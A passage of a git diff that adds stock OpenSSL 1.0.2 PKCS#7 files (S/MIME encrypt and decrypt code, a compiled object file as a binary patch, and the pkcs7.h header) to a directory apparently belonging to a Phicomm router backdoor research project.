+                X509_find_by_issuer_and_serial(p7->d.sign->cert,
+                                               ias->issuer, ias->serial);
+        if (!signer) {
+            PKCS7err(PKCS7_F_PKCS7_GET0_SIGNERS,
+                     PKCS7_R_SIGNER_CERTIFICATE_NOT_FOUND);
+            sk_X509_free(signers);
+            return 0;
+        }
+
+        if (!sk_X509_push(signers, signer)) {
+            sk_X509_free(signers);
+            return NULL;
+        }
+    }
+    return signers;
+}
+
+/* Build a complete PKCS#7 enveloped data */
+
+PKCS7 *PKCS7_encrypt(STACK_OF(X509) *certs, BIO *in, const EVP_CIPHER *cipher,
+                     int flags)
+{
+    PKCS7 *p7;
+    BIO *p7bio = NULL;
+    int i;
+    X509 *x509;
+    if (!(p7 = PKCS7_new())) {
+        PKCS7err(PKCS7_F_PKCS7_ENCRYPT, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (!PKCS7_set_type(p7, NID_pkcs7_enveloped))
+        goto err;
+    if (!PKCS7_set_cipher(p7, cipher)) {
+        PKCS7err(PKCS7_F_PKCS7_ENCRYPT, PKCS7_R_ERROR_SETTING_CIPHER);
+        goto err;
+    }
+
+    for (i = 0; i < sk_X509_num(certs); i++) {
+        x509 = sk_X509_value(certs, i);
+        if (!PKCS7_add_recipient(p7, x509)) {
+            PKCS7err(PKCS7_F_PKCS7_ENCRYPT, PKCS7_R_ERROR_ADDING_RECIPIENT);
+            goto err;
+        }
+    }
+
+    if (flags & PKCS7_STREAM)
+        return p7;
+
+    if (PKCS7_final(p7, in, flags))
+        return p7;
+
+ err:
+
+    BIO_free_all(p7bio);
+    PKCS7_free(p7);
+    return NULL;
+
+}
+
+int PKCS7_decrypt(PKCS7 *p7, EVP_PKEY *pkey, X509 *cert, BIO *data, int flags)
+{
+    BIO *tmpmem;
+    int ret, i;
+    char buf[4096];
+
+    if (!p7) {
+        PKCS7err(PKCS7_F_PKCS7_DECRYPT, PKCS7_R_INVALID_NULL_POINTER);
+        return 0;
+    }
+
+    if (!PKCS7_type_is_enveloped(p7)) {
+        PKCS7err(PKCS7_F_PKCS7_DECRYPT, PKCS7_R_WRONG_CONTENT_TYPE);
+        return 0;
+    }
+
+    if (cert && !X509_check_private_key(cert, pkey)) {
+        PKCS7err(PKCS7_F_PKCS7_DECRYPT,
+                 PKCS7_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE);
+        return 0;
+    }
+
+    if (!(tmpmem = PKCS7_dataDecode(p7, pkey, NULL, cert))) {
+        PKCS7err(PKCS7_F_PKCS7_DECRYPT, PKCS7_R_DECRYPT_ERROR);
+        return 0;
+    }
+
+    if (flags & PKCS7_TEXT) {
+        BIO *tmpbuf, *bread;
+        /* Encrypt BIOs can't do BIO_gets() so add a buffer BIO */
+        if (!(tmpbuf = BIO_new(BIO_f_buffer()))) {
+            PKCS7err(PKCS7_F_PKCS7_DECRYPT, ERR_R_MALLOC_FAILURE);
+            BIO_free_all(tmpmem);
+            return 0;
+        }
+        if (!(bread = BIO_push(tmpbuf, tmpmem))) {
+            PKCS7err(PKCS7_F_PKCS7_DECRYPT, ERR_R_MALLOC_FAILURE);
+            BIO_free_all(tmpbuf);
+            BIO_free_all(tmpmem);
+            return 0;
+        }
+        ret = SMIME_text(bread, data);
+        if (ret > 0 && BIO_method_type(tmpmem) == BIO_TYPE_CIPHER) {
+            if (!BIO_get_cipher_status(tmpmem))
+                ret = 0;
+        }
+        BIO_free_all(bread);
+        return ret;
+    } else {
+        for (;;) {
+            i = BIO_read(tmpmem, buf, sizeof(buf));
+            if (i <= 0) {
+                ret = 1;
+                if (BIO_method_type(tmpmem) == BIO_TYPE_CIPHER) {
+                    if (!BIO_get_cipher_status(tmpmem))
+                        ret = 0;
+                }
+
+                break;
+            }
+            if (BIO_write(data, buf, i) != i) {
+                ret = 0;
+                break;
+            }
+        }
+        BIO_free_all(tmpmem);
+        return ret;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_smime.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_smime.o
new file mode 100644
index 0000000000000000000000000000000000000000..bd422dc9916e6f89e5359d834c09efd93b83be85
GIT binary patch
literal 11696
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7.h
new file mode 100644
index 0000000..b51b386
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pkcs7.h
@@ -0,0 +1,481 @@
+/* crypto/pkcs7/pkcs7.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_PKCS7_H
+# define HEADER_PKCS7_H
+
+# include <openssl/asn1.h>
+# include <openssl/bio.h>
+# include <openssl/e_os2.h>
+
+# include <openssl/symhacks.h>
+# include <openssl/ossl_typ.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_SYS_WIN32
+/* Under Win32 thes are defined in wincrypt.h */
+#  undef PKCS7_ISSUER_AND_SERIAL
+#  undef PKCS7_SIGNER_INFO
+# endif
+
+/*-
+Encryption_ID           DES-CBC
+Digest_ID               MD5
+Digest_Encryption_ID    rsaEncryption
+Key_Encryption_ID       rsaEncryption
+*/
+
+typedef struct pkcs7_issuer_and_serial_st {
+    X509_NAME *issuer;
+    ASN1_INTEGER *serial;
+} PKCS7_ISSUER_AND_SERIAL;
+
+typedef struct pkcs7_signer_info_st {
+    ASN1_INTEGER *version;      /* version 1 */
+    PKCS7_ISSUER_AND_SERIAL *issuer_and_serial;
+    X509_ALGOR *digest_alg;
+    STACK_OF(X509_ATTRIBUTE) *auth_attr; /* [ 0 ] */
+    X509_ALGOR *digest_enc_alg;
+    ASN1_OCTET_STRING *enc_digest;
+    STACK_OF(X509_ATTRIBUTE) *unauth_attr; /* [ 1 ] */
+    /* The private key to sign with */
+    EVP_PKEY *pkey;
+} PKCS7_SIGNER_INFO;
+
+DECLARE_STACK_OF(PKCS7_SIGNER_INFO)
+DECLARE_ASN1_SET_OF(PKCS7_SIGNER_INFO)
+
+typedef struct pkcs7_recip_info_st {
+    ASN1_INTEGER *version;      /* version 0 */
+    PKCS7_ISSUER_AND_SERIAL *issuer_and_serial;
+    X509_ALGOR *key_enc_algor;
+    ASN1_OCTET_STRING *enc_key;
+    X509 *cert;                 /* get the pub-key from this */
+} PKCS7_RECIP_INFO;
+
+DECLARE_STACK_OF(PKCS7_RECIP_INFO)
+DECLARE_ASN1_SET_OF(PKCS7_RECIP_INFO)
+
+typedef struct pkcs7_signed_st {
+    ASN1_INTEGER *version;      /* version 1 */
+    STACK_OF(X509_ALGOR) *md_algs; /* md used */
+    STACK_OF(X509) *cert;       /* [ 0 ] */
+    STACK_OF(X509_CRL) *crl;    /* [ 1 ] */
+    STACK_OF(PKCS7_SIGNER_INFO) *signer_info;
+    struct pkcs7_st *contents;
+} PKCS7_SIGNED;
+/*
+ * The above structure is very very similar to PKCS7_SIGN_ENVELOPE. How about
+ * merging the two
+ */
+
+typedef struct pkcs7_enc_content_st {
+    ASN1_OBJECT *content_type;
+    X509_ALGOR *algorithm;
+    ASN1_OCTET_STRING *enc_data; /* [ 0 ] */
+    const EVP_CIPHER *cipher;
+} PKCS7_ENC_CONTENT;
+
+typedef struct pkcs7_enveloped_st {
+    ASN1_INTEGER *version;      /* version 0 */
+    STACK_OF(PKCS7_RECIP_INFO) *recipientinfo;
+    PKCS7_ENC_CONTENT *enc_data;
+} PKCS7_ENVELOPE;
+
+typedef struct pkcs7_signedandenveloped_st {
+    ASN1_INTEGER *version;      /* version 1 */
+    STACK_OF(X509_ALGOR) *md_algs; /* md used */
+    STACK_OF(X509) *cert;       /* [ 0 ] */
+    STACK_OF(X509_CRL) *crl;    /* [ 1 ] */
+    STACK_OF(PKCS7_SIGNER_INFO) *signer_info;
+    PKCS7_ENC_CONTENT *enc_data;
+    STACK_OF(PKCS7_RECIP_INFO) *recipientinfo;
+} PKCS7_SIGN_ENVELOPE;
+
+typedef struct pkcs7_digest_st {
+    ASN1_INTEGER *version;      /* version 0 */
+    X509_ALGOR *md;             /* md used */
+    struct pkcs7_st *contents;
+    ASN1_OCTET_STRING *digest;
+} PKCS7_DIGEST;
+
+typedef struct pkcs7_encrypted_st {
+    ASN1_INTEGER *version;      /* version 0 */
+    PKCS7_ENC_CONTENT *enc_data;
+} PKCS7_ENCRYPT;
+
+typedef struct pkcs7_st {
+    /*
+     * The following is non NULL if it contains ASN1 encoding of this
+     * structure
+     */
+    unsigned char *asn1;
+    long length;
+# define PKCS7_S_HEADER  0
+# define PKCS7_S_BODY    1
+# define PKCS7_S_TAIL    2
+    int state;                  /* used during processing */
+    int detached;
+    ASN1_OBJECT *type;
+    /* content as defined by the type */
+    /*
+     * all encryption/message digests are applied to the 'contents', leaving
+     * out the 'type' field.
+     */
+    union {
+        char *ptr;
+        /* NID_pkcs7_data */
+        ASN1_OCTET_STRING *data;
+        /* NID_pkcs7_signed */
+        PKCS7_SIGNED *sign;
+        /* NID_pkcs7_enveloped */
+        PKCS7_ENVELOPE *enveloped;
+        /* NID_pkcs7_signedAndEnveloped */
+        PKCS7_SIGN_ENVELOPE *signed_and_enveloped;
+        /* NID_pkcs7_digest */
+        PKCS7_DIGEST *digest;
+        /* NID_pkcs7_encrypted */
+        PKCS7_ENCRYPT *encrypted;
+        /* Anything else */
+        ASN1_TYPE *other;
+    } d;
+} PKCS7;
+
+DECLARE_STACK_OF(PKCS7)
+DECLARE_ASN1_SET_OF(PKCS7)
+DECLARE_PKCS12_STACK_OF(PKCS7)
+
+# define PKCS7_OP_SET_DETACHED_SIGNATURE 1
+# define PKCS7_OP_GET_DETACHED_SIGNATURE 2
+
+# define PKCS7_get_signed_attributes(si) ((si)->auth_attr)
+# define PKCS7_get_attributes(si)        ((si)->unauth_attr)
+
+# define PKCS7_type_is_signed(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_signed)
+# define PKCS7_type_is_encrypted(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_encrypted)
+# define PKCS7_type_is_enveloped(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_enveloped)
+# define PKCS7_type_is_signedAndEnveloped(a) \
+                (OBJ_obj2nid((a)->type) == NID_pkcs7_signedAndEnveloped)
+# define PKCS7_type_is_data(a)   (OBJ_obj2nid((a)->type) == NID_pkcs7_data)
+# define PKCS7_type_is_digest(a)   (OBJ_obj2nid((a)->type) == NID_pkcs7_digest)
+
+# define PKCS7_set_detached(p,v) \
+                PKCS7_ctrl(p,PKCS7_OP_SET_DETACHED_SIGNATURE,v,NULL)
+# define PKCS7_get_detached(p) \
+                PKCS7_ctrl(p,PKCS7_OP_GET_DETACHED_SIGNATURE,0,NULL)
+
+# define PKCS7_is_detached(p7) (PKCS7_type_is_signed(p7) && PKCS7_get_detached(p7))
+
+/* S/MIME related flags */
+
+# define PKCS7_TEXT              0x1
+# define PKCS7_NOCERTS           0x2
+# define PKCS7_NOSIGS            0x4
+# define PKCS7_NOCHAIN           0x8
+# define PKCS7_NOINTERN          0x10
+# define PKCS7_NOVERIFY          0x20
+# define PKCS7_DETACHED          0x40
+# define PKCS7_BINARY            0x80
+# define PKCS7_NOATTR            0x100
+# define PKCS7_NOSMIMECAP        0x200
+# define PKCS7_NOOLDMIMETYPE     0x400
+# define PKCS7_CRLFEOL           0x800
+# define PKCS7_STREAM            0x1000
+# define PKCS7_NOCRL             0x2000
+# define PKCS7_PARTIAL           0x4000
+# define PKCS7_REUSE_DIGEST      0x8000
+
+/* Flags: for compatibility with older code */
+
+# define SMIME_TEXT      PKCS7_TEXT
+# define SMIME_NOCERTS   PKCS7_NOCERTS
+# define SMIME_NOSIGS    PKCS7_NOSIGS
+# define SMIME_NOCHAIN   PKCS7_NOCHAIN
+# define SMIME_NOINTERN  PKCS7_NOINTERN
+# define SMIME_NOVERIFY  PKCS7_NOVERIFY
+# define SMIME_DETACHED  PKCS7_DETACHED
+# define SMIME_BINARY    PKCS7_BINARY
+# define SMIME_NOATTR    PKCS7_NOATTR
+
+DECLARE_ASN1_FUNCTIONS(PKCS7_ISSUER_AND_SERIAL)
+
+int PKCS7_ISSUER_AND_SERIAL_digest(PKCS7_ISSUER_AND_SERIAL *data,
+                                   const EVP_MD *type, unsigned char *md,
+                                   unsigned int *len);
+# ifndef OPENSSL_NO_FP_API
+PKCS7 *d2i_PKCS7_fp(FILE *fp, PKCS7 **p7);
+int i2d_PKCS7_fp(FILE *fp, PKCS7 *p7);
+# endif
+PKCS7 *PKCS7_dup(PKCS7 *p7);
+PKCS7 *d2i_PKCS7_bio(BIO *bp, PKCS7 **p7);
+int i2d_PKCS7_bio(BIO *bp, PKCS7 *p7);
+int i2d_PKCS7_bio_stream(BIO *out, PKCS7 *p7, BIO *in, int flags);
+int PEM_write_bio_PKCS7_stream(BIO *out, PKCS7 *p7, BIO *in, int flags);
+
+DECLARE_ASN1_FUNCTIONS(PKCS7_SIGNER_INFO)
+DECLARE_ASN1_FUNCTIONS(PKCS7_RECIP_INFO)
+DECLARE_ASN1_FUNCTIONS(PKCS7_SIGNED)
+DECLARE_ASN1_FUNCTIONS(PKCS7_ENC_CONTENT)
+DECLARE_ASN1_FUNCTIONS(PKCS7_ENVELOPE)
+DECLARE_ASN1_FUNCTIONS(PKCS7_SIGN_ENVELOPE)
+DECLARE_ASN1_FUNCTIONS(PKCS7_DIGEST)
+DECLARE_ASN1_FUNCTIONS(PKCS7_ENCRYPT)
+DECLARE_ASN1_FUNCTIONS(PKCS7)
+
+DECLARE_ASN1_ITEM(PKCS7_ATTR_SIGN)
+DECLARE_ASN1_ITEM(PKCS7_ATTR_VERIFY)
+
+DECLARE_ASN1_NDEF_FUNCTION(PKCS7)
+DECLARE_ASN1_PRINT_FUNCTION(PKCS7)
+
+long PKCS7_ctrl(PKCS7 *p7, int cmd, long larg, char *parg);
+
+int PKCS7_set_type(PKCS7 *p7, int type);
+int PKCS7_set0_type_other(PKCS7 *p7, int type, ASN1_TYPE *other);
+int PKCS7_set_content(PKCS7 *p7, PKCS7 *p7_data);
+int PKCS7_SIGNER_INFO_set(PKCS7_SIGNER_INFO *p7i, X509 *x509, EVP_PKEY *pkey,
+                          const EVP_MD *dgst);
+int PKCS7_SIGNER_INFO_sign(PKCS7_SIGNER_INFO *si);
+int PKCS7_add_signer(PKCS7 *p7, PKCS7_SIGNER_INFO *p7i);
+int PKCS7_add_certificate(PKCS7 *p7, X509 *x509);
+int PKCS7_add_crl(PKCS7 *p7, X509_CRL *x509);
+int PKCS7_content_new(PKCS7 *p7, int nid);
+int PKCS7_dataVerify(X509_STORE *cert_store, X509_STORE_CTX *ctx,
+                     BIO *bio, PKCS7 *p7, PKCS7_SIGNER_INFO *si);
+int PKCS7_signatureVerify(BIO *bio, PKCS7 *p7, PKCS7_SIGNER_INFO *si,
+                          X509 *x509);
+
+BIO *PKCS7_dataInit(PKCS7 *p7, BIO *bio);
+int PKCS7_dataFinal(PKCS7 *p7, BIO *bio);
+BIO *PKCS7_dataDecode(PKCS7 *p7, EVP_PKEY *pkey, BIO *in_bio, X509 *pcert);
+
+PKCS7_SIGNER_INFO *PKCS7_add_signature(PKCS7 *p7, X509 *x509,
+                                       EVP_PKEY *pkey, const EVP_MD *dgst);
+X509 *PKCS7_cert_from_signer_info(PKCS7 *p7, PKCS7_SIGNER_INFO *si);
+int PKCS7_set_digest(PKCS7 *p7, const EVP_MD *md);
+STACK_OF(PKCS7_SIGNER_INFO) *PKCS7_get_signer_info(PKCS7 *p7);
+
+PKCS7_RECIP_INFO *PKCS7_add_recipient(PKCS7 *p7, X509 *x509);
+void PKCS7_SIGNER_INFO_get0_algs(PKCS7_SIGNER_INFO *si, EVP_PKEY **pk,
+                                 X509_ALGOR **pdig, X509_ALGOR **psig);
+void PKCS7_RECIP_INFO_get0_alg(PKCS7_RECIP_INFO *ri, X509_ALGOR **penc);
